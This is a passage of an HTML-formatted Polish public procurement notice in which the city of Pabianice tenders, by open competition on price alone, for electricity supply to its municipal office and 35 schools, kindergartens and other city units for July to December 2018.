id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Bezpośrednie dostarczenie lub za pośrednictwem operatora pocztowego lub firmy kurierskiej w wersji papierowej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urzęd Miejski w Pabianicach- Biuro Obsługi Interesanta, ul. Zamkowa 16, 95-200 Pabianice</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa energii elektrycznej do punktów poboru energii elektrycznej Miasta Pabianice w ramach wspólnego zamówienia prowadzonego w trybie art. 16 ust. 1 ustawy Prawo zamówień publicznych</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZPK.271.10.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia jest dostawa energii elektrycznej zgodnie z przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (tj. Dz.U. Z 2017 r. poz. 220 z późn. zm.) dla potrzeb Miasta Pabianice wraz z podległymi jednostkami organizacyjnymi wg poniższego wykazu Kontrahentów:1)	Miasto Pabianice - Urząd Miejski w Pabianicach, 95-200 Pabianice ul. Zamkowa 16, NIP 731-196-27-56, REGON 472057715, w tym:a)	Kancelaria Prezydenta Miasta Pabianic (KPM),b)	Wydział Infrastruktury Technicznej i Komunikacji (ITK),c)	Wydział Ochrony Środowiska (OS).2)	Żłobek Miejski, 95-200 Pabianice ul. Moniuszki 146 NIP 7311329220, REGON 471000050;3)	Przedszkole Miejskie nr 2, 95-200 Pabianice ul. Cicha 26, NIP 7311058910, REGON 000733174;4)	Przedszkole Miejskie nr 3, 95-200 Pabianice ul. Moniuszki 163, NIP 7311055567, REGON 0042716705)	Przedszkole Miejskie nr 4, 95-200 Pabianice ul. Żytnia 13/17, NIP 7311230131, REGON 004271724;6)	Przedszkole Miejskie nr 5, 95-200 Pabianice ul. Zamkowa 48, NIP 7311428991, REGON 000733168;7)	Przedszkole Miejskie nr 6, 95-200 Pabianice ul. Warszawska 53, NIP 7311129515, REGON 0007331188)	Przedszkole Miejskie nr 8, 95-200 Pabianice ul. Św. Jana 43, NIP 7311015042, REGON 470010537;9)	Przedszkole Miejskie nr 11 z Oddziałami Integracyjnymi, 95-200 Pabianice ul. Św. Jana 28, NIP 7311028174, REGON 004271693;10)	Przedszkole Miejskie nr 12, 95-200 Pabianice ul. Śniadeckiego 6a, NIP 7311129024, REGON 470010543;11)	Przedszkole Miejskie nr 13, 95-200 Pabianice ul. Mokra 19/23, NIP 7311129863, REGON 47001055012)	Przedszkole Miejskie nr 14, 95-200 Pabianice ul. Odrodzenia 10, NIP 7311129030, REGON 004271701;13)	Przedszkole Miejskie nr 15, 95-200 Pabianice ul. ks. Piotra Skargi 75, NIP 7311028168, REGON 470010566;14)	Przedszkole Miejskie nr 16 z Oddziałami Integracyjnymi i Specjalnymi, 95-200 Pabianice, ul. Bugaj 58 NIP 7311129900, REGON 004271718;15)	Szkoła Podstawowa nr 1 z Klasami Integracyjnymi, 95-200 Pabianice ul. Pułaskiego 22/24, NIP 7311236553, REGON 000210737;16) Szkoła Podstawowa nr 2, 95-200 Pabianice ul. Tkacka 15, NIP 7312057781, REGON 367991897;17)	Szkoła Podstawowa nr 3, 95-200 Pabianice ul. Mokra 28/34, NIP 7311129567, REGON 001385002;18)	Szkoła Podstawowa nr 5, 95-200 Pabianice ul. Zamkowa 65, NIP 7311129805, REGON 000211493;19)	Szkoła Podstawowa nr 8, 95-200 Pabianice ul. ks. Piotra Skargi 30, NIP 7311027944, REGON 000212417;20)	Szkoła Podstawowa nr 9 z Oddziałami Integracyjnymi, 95-200 Pabianice ul. Partyzancka 56a, NIP 7311015579, REGON 000212630;21)	Szkoła Podstawowa nr 13, 95-200 Pabianice ul. Jana Pawła II 16, NIP 7311014396, REGON 000213693;22)	Szkoła Podstawowa nr 14, 95-200 Pabianice ul. Ostatnia 15a, NIP 7311235588, REGON 000213925;23)	Szkoła Podstawowa nr 15, 95-200 Pabianice ul. Marii Skłodowskiej-Curie 5, NIP 7312057723, REGON 367999023;24)	Szkoła Podstawowa nr 16, 95-200 Pabianice ul. 20 Stycznia 9/13, NIP 7312057798, REGON 367992081;25)	Szkoła Podstawowa nr 17, 95-200 Pabianice ul. Warszawska 65, NIP 7311015591, REGON 000214528;26)	Miejskie Centrum Pomocy Społecznej, 95-200 Pabianice, ul, Gdańska 7, NIP 7311875388, REGON 473215122;27)	Środowiskowy Dom Pomocy Dla Osób Przewlekle Chorych Psychicznie i Niepełnosprawnych Intelektualnie (typ AB), 95-200 Pabianice ul. Cicha 24, NIP 7312042874, REGON 101340427;28)	Miejski Ośrodek Sportu i Rekreacji, 95-200 Pabianice, ul. gen. Stefana ,,Grota" Roweckiego 3, NIP 7312030032, REGON 100999466;29)	Miejski Zakład Pogrzebowy, 95-200 Pabianice, ul. Jana Kilińskiego57/59, NIP 7310006880, REGON 1010111155;30)	Schronisko Dla Zwierząt w Pabianicach, 95-200 Pabianice, ul. Partyzancka 110, NIP 7311748589, REGON 472283819;31)	Zakład Gospodarki Mieszkaniowej, 95-200 Pabianice, ul. Warzywna 6, NIP 7310005774, REGON 470013843;32)	Zarząd Dróg Miejskich, 95-200 Pabianice, ul. Warzywna 1, NIP 7312053808, REGON 365914881;33)	Miejska Biblioteka Publiczna, 95-200 Pabianice, ul. Św. Jana 10, NIP 7311140379, REGON 470930835;34)	Miejski Ośrodek Kultury, 95-200 Pabianice, ul. Kościuszki 14, NIP 7311008214, REGON 470587840;35)	Muzeum miasta Pabianic, 95-200 Pabianice, ul. Stary Rynek 1/2, NIP 7311368214, REGON 470931409;36)	Miejski Zakład Komunikacyjny Sp. z o. o; 95-200 Pabianice, u. Lutomierska 48, NIP 7311923934, REGON 100065150;2.	Szczegółowy opis przedmiotu zamówienia został zawarty w załączniku nr 1 do specyfikacji istotnych warunków zamówienia. Wykaz punktów odbioru zawiera załącznik nr 2 do specyfikacji istotnych warunków zamówienia3.	Kod CPV: 09310000-5 - elektryczność4.	Okres rozliczeniowy za pobraną energię elektryczną czynną dostosowany będzie do okresu rozliczeniowego stosowanego dla PPE Odbiorcy końcowego przez OSD.5.	Sprzedawca otrzymywać będzie wynagrodzenie z tytułu realizacji umów sprzedaży w wysokości stanowiącej sumę iloczynów ceny brutto i pobranej energii elektrycznej czynnej, zliczanej na podstawie odczytów wskazań układów pomiarowych.6.	W wyniku rozstrzygnięcia niniejszego postępowania na dostawę energii elektrycznej Wykonawca zawrze umowę generalną wg wzoru zawartego w Załączniku Nr 6 do SIWZ oraz umowy szczegółowe z każdym podmiotem uczestniczącym w niniejszym postępowaniu (wymieniony w Rozdz. III pkt. 1) odrębną umowę. W treściach umów szczegółowych zostaną zawarte informacje dotycząca opisu faktur dla tych podmiotów w zakresie Nabywcy oraz Odbiorcy.7.	Zamawiający oświadcza, że posiada niezbędne na realizację zamówienia środki finansowe zabezpieczone w budżecie miasta Pabianic.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">09310000-5</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający przewiduje możliwość udzielenia zamówień podobnych, o których jest mowa w art. 67 ust. 1 pkt 7 ustawy Pzp, do wysokości nie większej niż 10% zamówienia podstawowego, polegających na zwiększeniu bieżących dostaw;</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2018-07-01</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Termin realizacji zamówienia: do dnia 31 grudnia 2018 roku z tym, że rozpoczęcie dostaw energii elektrycznej do poszczególnych punktów poboru nastąpi z dniem 01 lipca 2018 roku, nie wcześniej jednak niż po pozytywnym przeprowadzeniu procedury zmiany sprzedawcy.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Wykonawca musi posiadać aktualną koncesję na prowadzenia działalności gospodarczej w zakresie obrotu energią elektryczną wydaną przez Prezesa urzędu Regulacji Energetyki oraz obowiązującą umowę na sprzedaż energii elektrycznej za pośrednictwem sieci dystrybucyjnej, zawartą z lokalnym operatorem systemu dystrybucyjnego, do wszystkich obiektów Zamawiającego (§ 2 ust. 1 pkt. 1 Rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów jakie może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia).</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie formułuje specjalnych wymagań dla potwierdzenia spełnienia tego warunku</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie formułuje specjalnych wymagań dla potwierdzenia spełnienia tego warunku</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Formularz oferty (złożony według wzoru zamieszczonego w specyfikacji istotnych warunków zamówienia);2. Zobowiązanie podmiotu trzeciego, na którego zdolnościach lub sytuacji Wykonawca polega, o którym mowa w Rozdziale V, punkt 2.4, podpunkt a) niniejszej specyfikacji istotnych warunków zamówienia (jeśli dotyczy). 3. Aktualna koncesja na prowadzenie działalności gospodarczej w zakresie obrotu energią elektryczną wydaną przez Prezesa urzędu Regulacji Energetyki.4. Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy PZP, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp Wraz ze złożeniem oświadczenia według wzoru wskazanego w SIWZ (wzór załącznik 4 do siwz), Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: 